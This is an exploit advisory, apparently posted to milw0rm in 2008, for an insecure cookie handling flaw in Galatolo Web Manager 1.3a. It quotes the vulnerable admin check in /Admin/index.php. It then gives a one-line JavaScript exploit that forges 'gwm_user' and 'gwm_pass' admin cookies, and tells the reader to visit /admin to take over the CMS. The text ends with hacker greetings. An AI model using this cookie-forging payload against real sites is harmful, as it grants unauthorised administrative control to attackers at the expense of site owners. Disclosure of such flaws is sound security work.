44 lines
No EOL
1.5 KiB
Text
44 lines
No EOL
1.5 KiB
Text
############################################################################################
|
|
# #
|
|
# ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::.... #
|
|
############################################################################################
|
|
|
|
Virangar Security Team
|
|
|
|
www.virangar.net
|
|
www.virangar.ir
|
|
|
|
--------
|
|
Discoverd By :virangar security team(hadihadi)
|
|
|
|
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
|
|
|
|
& all virangar members & all hackerz
|
|
|
|
greetz:to my best friend in the world hadi_aryaie2004
|
|
& my lovely friend arash(imm02tal)
|
|
-------
|
|
DESCRIPTION:
|
|
Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates
|
|
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
|
|
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
|
|
logged in as a legit admin.
|
|
---
|
|
vuln code in /Admin/index.php:
|
|
|
|
if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){
|
|
top();
|
|
menu();
|
|
echo $wellcome_admin;
|
|
foot();
|
|
}
|
|
|
|
---
|
|
exploit:
|
|
javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
|
|
-----
|
|
now visit /admin and you can get admin access and manage the cms ;)
|
|
-------
|
|
young iranian h4ck3rz
|
|
|
|
# milw0rm.com [2008-07-15] |